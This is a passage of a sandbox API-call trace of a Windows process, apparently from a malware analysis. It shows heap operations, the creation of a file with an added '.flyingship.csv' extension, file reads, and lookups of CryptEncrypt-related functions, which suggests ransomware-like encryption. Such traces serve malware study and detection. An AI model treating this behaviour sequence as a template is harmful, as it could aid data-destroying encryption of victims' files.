hHeap=0x8a0000) returned 1 [0178.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0178.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0178.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0178.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0178.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0178.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0178.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0178.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0178.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0178.461] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf")) returned 0x10 [0178.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0178.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0178.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0178.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0178.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0178.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0178.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0178.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0178.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0178.462] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\Ob0CMu.flyingship.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\ob0cmu.flyingship.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0178.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0178.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0178.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0178.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0178.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0178.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0178.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0178.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0178.464] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0178.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0178.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0178.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0178.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0178.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0178.464] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0178.464] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0178.464] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0178.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0178.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0178.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0178.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0178.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0178.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0178.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0178.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0178.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0178.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0178.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0178.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0178.465] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0178.465] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0178.468] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x6989, lpOverlapped=0x0) returned 1 [0178.469] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0178.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0178.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0178.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0178.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x16989) returned 0xbea018 [0178.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0178.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0178.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0178.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0178.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0178.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0178.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x16989) returned 0xa5f008 [0178.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0178.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.473] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0178.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0178.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0178.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0178.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0178.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x16989) returned 0xbea018 [0178.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0178.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0178.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0178.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0178.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.473] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0178.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0178.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0178.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0178.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0178.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0178.474] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0178.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0178.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0178.474] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0178.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0178.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0178.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0178.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2708 [0178.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0178.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0178.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0178.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0178.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x16989) returned 0xbea018 [0178.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2738 [0178.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0178.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0178.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0178.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27c8 [0178.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0178.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0178.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0178.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2828 [0178.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0178.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0178.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0178.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdaf8 [0178.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0178.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0178.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0178.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0178.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0178.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x16989) returned 0xa759a0 [0178.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0178.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0178.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0178.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0178.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0178.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0178.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0178.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0178.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0178.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0178.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0178.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0178.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0178.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0178.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0178.476] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0178.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0178.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0178.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0178.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0178.476] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0178.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0178.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0178.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0178.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0178.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0178.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0178.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0178.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0178.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0178.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0178.477] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0178.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0178.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0178.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0178.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c28d8 [0178.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0178.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0178.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0178.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0178.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba378 [0178.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0178.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0178.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0178.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0178.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0178.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0178.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0178.477] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0178.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0178.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0178.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0178.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0178.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0178.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0178.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0178.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0178.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0178.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0178.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0178.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0178.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0178.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0178.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0178.478] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0178.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0178.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0178.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0178.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0178.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0178.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0178.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0178.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0178.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0178.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0178.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0178.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0178.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0178.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0178.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0178.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0178.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0178.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0178.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0178.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0178.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0178.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0178.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0178.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0178.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.478] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0178.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0178.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0178.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0178.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0178.479] RtlAllocateHeap 